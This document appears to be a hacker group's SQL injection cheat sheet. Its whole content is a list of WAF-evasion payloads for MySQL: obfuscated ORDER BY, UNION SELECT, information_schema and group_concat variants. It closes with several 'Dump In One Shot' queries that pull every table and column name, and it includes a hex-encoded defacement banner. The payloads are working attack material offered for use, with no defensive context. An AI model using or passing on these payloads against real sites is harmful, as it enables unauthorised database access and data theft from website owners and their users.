sqli waf & dios

1.  
2.  
3. 0x3c623e3c693e5b2021205d20494e4a454354454420425920415a5a41545353494e53205b2021205d3c2f693e3c2f623e3c62723e3c68723e3c62723e
4.  
5.  
6.  
7.  
8. [~]+order+by+[~]
9.  
10.  
11. /**/ORDER/**/BY/**/
12. /*!order*/+/*!by*/
13. /*!ORDER+BY*/
14. /*!50000ORDER+BY*/
15. /*!50000ORDER*//**//*!50000BY*/
16. /*!12345ORDER*/+/*!BY*/
17.  
18.  
19.  
20. [~]+UNION+select+[~]
21.  
22.  
23. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
24. %55nion(%53elect+1,2,3)--+-
25. +union+distinct+select+
26. +union+distinctROW+select+
27. /**//*!12345UNION+SELECT*//**/
28. /**//*!50000UNION+SELECT*//**/
29. /**/UNION/**//*!50000SELECT*//**/
30. /*!50000UniON+SeLeCt*/
31. union+/*!50000%53elect*/
32. +#uNiOn+#sEleCt
33. +#1q%0AuNiOn+all#qa%0A#%0AsEleCt
34. /*!%55NiOn*/+/*!%53eLEct*/
35. /*!u%6eion*/+/*!se%6cect*/
36. +un/**/ion+se/**/lect
37. uni%0bon+se%0blect
38. %2f**%2funion%2f**%2fselect
39. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%
40. 0A
41. REVERSE(noinu)+REVERSE(tceles)
42. /*--*/union/*--*/select/*--*/
43. union+(/*!/**/+SeleCT+*/+1,2,3)
44. /*!union*/+/*!select*/
45. union+/*!select*/
46. /**/union/**/select/**/
47. /**/uNIon/**/sEleCt/**/
48. +%2F**/+Union/*!select*/
49. /**//*!union*//**//*!select*//**/
50. /*!uNIOn*/+/*!SelECt*/
51. +union+distinct+select+
52. +union+distinctROW+select+
53. uNiOn+aLl+sElEcT
54. UNIunionON+SELselectECT
55. /**/union/*!50000select*//**/
56. 0%a0union%a0select%09
57. %0Aunion%0Aselect%0A
58. %55nion/**/%53elect
59. uni<on+all=""+sel="">/*!20000%0d%0aunion*/+/*!
60. 20000%0d%0aSelEct*/
61. %252f%252a*/UNION%252f%252a+/SELECT%252f%
62. 252a*/
63. %0A%09UNION%0CSELECT%10NULL%
64. /*!union*//*--*//*!all*//*--*//*!select*/
65. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%
66. 0A1%+2C2%2C
67. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
68. +UnIoN/*&a=*/SeLeCT/*&a=*/
69. union+sel%0bect
70. +uni*on+sel*ect+
71. ++#1q%0Aunion+all#qa%0A#%0Aselect
72. union(select+(1),(2),(3),(4),(5))
73. UNION(SELECT(column)FROM(table))
74. %23xyz%0AUnIOn%23xyz%0ASeLecT+
75. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
76. union(select(1),2,3)
77. union+(select+1111,2222,3333)
78. uNioN+(/*!/**/+SeleCT+*/+11)
79. union+(select+1111,2222,3333)
80. ++#1q%0AuNiOn+all#qa%0A#%0AsEleCt
81. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//
82. *T*/
83. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%
84. 53eLEct*/%0A/*nnaa*/
85. +%23sexsexsex%0AUnIOn%23sexsexs+ex%
86. 0ASeLecT+
87. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D
88. %0A1%+2C2%2C
89. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
90. +%23blobblobblob%0aUnIOn%23blobblobblob%
91. 0aSeLe+cT+
92. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%
93. 0d%0aSelEct*/
94. /union\sselect/g
95. /union\s+select/i
96. /*!UnIoN*/SeLeCT
97. +UnIoN/*&a=*/SeLeCT/*&a=*/
98. +uni>on+sel>ect+
99. +(UnIoN)+(SelECT)+
100. +(UnI)(oN)+(SeL)(EcT)
101. +’UnI”On’+'SeL”ECT’
102. +uni+on+sel+ect+
103. +/*!UnIoN*/+/*!SeLeCt*/+
104. /*!u%6eion*/+/*!se%6cect*/
105. uni%20union%20/*!select*/%20
106. union%23aa%0Aselect
107. /**/union/*!50000select*/
108. /^.*union.*$/+/^.*select.*$/
109. /*union*/union/*select*/select+
110. /*uni+X+on*/union/*sel+X+ect*/
111. +un/**/ion+sel/**/ect+
112. +UnIOn%0d%0aSeleCt%0d%0a
113. UNION/*&test=1*/SELECT/*&pwn=2*/
114. un?<ion+sel="">+un/**/ion+se/**/lect+
115. +UNunionION+SEselectLECT+
116. +uni%0bon+se%0blect+
117. %252f%252a*/union%252f%252a+/select%252f%
118. 252a*/
119. /%2A%2A/union/%2A%2A/select/%2A%2A/
120. %2f**%2funion%2f**%2fselect%2f**%2f
121. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%
122. 0A
123. /*!UnIoN*/SeLecT+
124. [~]+information_schema.tables+[~]
125. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
126. WhERe*/+/*!TaBle_ScHEmA*/=schEMA()--+-
127. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
128. WhERe*/+/*!TaBle_ScHEmA*/+like+schEMA()--+-
129. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
130. WhERe*/+/*!TaBle_ScHEmA*/=database()--+-
131. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
132. WhERe*/+/*!TaBle_ScHEmA*/+like+database()--+-
133. /*!FrOm*/+%69nformation_schema./**/columns+/*!
134. 50000Where*/+/*!%54able_name*/=hex+table
135. /*!FrOm*/+information_schema./**/columns+/*!
136. 12345Where*/+/*!%54able_name*/+like+hex+table
137.  
138.  
139.  
140. [~]+concat()+[~]
141.  
142.  
143.  
144. CoNcAt()
145. concat()
146. CON%08CAT()
147. CoNcAt()
148. %0AcOnCat()
149. /**//*!12345cOnCat*/
150. /*!50000cOnCat*/(/*!*/)
151. unhex(hex(concat(table_name)))
152. unhex(hex(/*!12345concat*/(table_name)))
153. unhex(hex(/*!50000concat*/(table_name)))
154.  
155.  
156. [~]+group_concat()+[~]
157.  
158.  
159. /*!group_concat*/()
160. gRoUp_cOnCAt()
161. group_concat(/*!*/)
162. group_concat(/*!12345table_name*/)
163. group_concat(/*!50000table_name*/)
164. /*!group_concat*/(/*!12345table_name*/)
165. /*!group_concat*/(/*!50000table_name*/)
166. /*!12345group_concat*/(/*!12345table_name*/)
167. /*!50000group_concat*/(/*!50000table_name*/)
168. /*!GrOuP_ConCaT*/()
169. /*!12345GroUP_ConCat*/()
170. /*!50000gRouP_cOnCaT*/()
171. /*!50000Gr%6fuP_c%6fnCAT*/()
172. unhex(hex(group_concat(table_name)))
173. unhex(hex(/*!group_concat*/(/*!table_name*/)))
174. unhex(hex(/*!12345group_concat*/(table_name)))
175. unhex(hex(/*!12345group_concat*/(/*!table_
176. name*/)))
177. unhex(hex(/*!12345group_concat*/(/*!12345table_
178. name*/)))
179. unhex(hex(/*!50000group_concat*/(table_name)))
180. unhex(hex(/*!50000group_concat*/(/*!table_
181. name*/)))
182. unhex(hex(/*!50000group_concat*/(/*!50000table_
183. name*/)))
184. convert(group_concat(table_name)+using+ascii)
185. convert(group_concat(/*!table_name*/)+using
186. +ascii)
187. convert(group_concat(/*!12345table_name*/)+using
188. +ascii)
189. convert(group_concat(/*!50000table_name*/)+using
190. +ascii)
191. CONVERT(group_concat(table_name)+USING+latin1)
192. CONVERT(group_concat(table_name)+USING+latin2)
193. CONVERT(group_concat(table_name)+USING+latin3)
194. CONVERT(group_concat(table_name)+USING+latin4)
195. CONVERT(group_concat(table_name)+USING+latin5)
196.  
197.  
198.  
199. DIOS+(Dump+In+One+Shot)
200.  
201.  
202. (select(@)from(select(@:=0x00),(select(@)from
203. (information_schema.columns)where(@)in(@:=concat(@
204. ,0x3C62723E,table_name,0x3a,column_name))))a)
205.  
206. (select(select+concat(@:=0xa7,(select+count(*)from
207. (information_schema.columns)where(@:=concat(@
208. ,0x3c6c693e,table_name,0x3a,column_name))),@)))
209.  
210. (Select+export_set(5,@:=0,(select+count(*)from
211. (information_schema.columns)where@:=export_set
212. (5,export_set(5,@,table_name,0x3c6c693e,2),column_
213. name,0xa3a,2)),@,2))
214.  
215. make_set(6,@:=0x0a,(select(1)from(information_
216. schema.columns)where@:=make_set(511,@
217. ,0x3c6c693e,table_name,column_name)),@)
218.  
219. (select(@x)from(
220. select(@x:=0x00),(
221. select(0)
222. from(information_
223. schema.columns)
224. where(table_schema=
225. database())and(0x00)
226. in(@x:=concat
227. +(@x,0x3c62723e,table_
228. name,0x203a3a20,column_
229. name))))x)
230.  
231. (select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),
232. (@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)
233. where+(table_schema!='information_schema')+and(0x00)in
234. (@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat
235. (0x3c62723e,@tbl_sc:=table_schema,'+::
236. ',@tbl:=table_name,'+(Rows+',(select+table_rows+from
237. +information_schema.tables+where+table_schema=@tbl_sc+and
238. +table_name=@tbl),')',column_name),+(column_name))))))a)
239.  
240.  
241.  
242.  
243.  
244.  
245.  
246.  
247.  
248.  
249.  
250.  
251.  
252.  
253.  
254.  
255.  
256.  
257. © AZZATSSINS CYBERSERKERS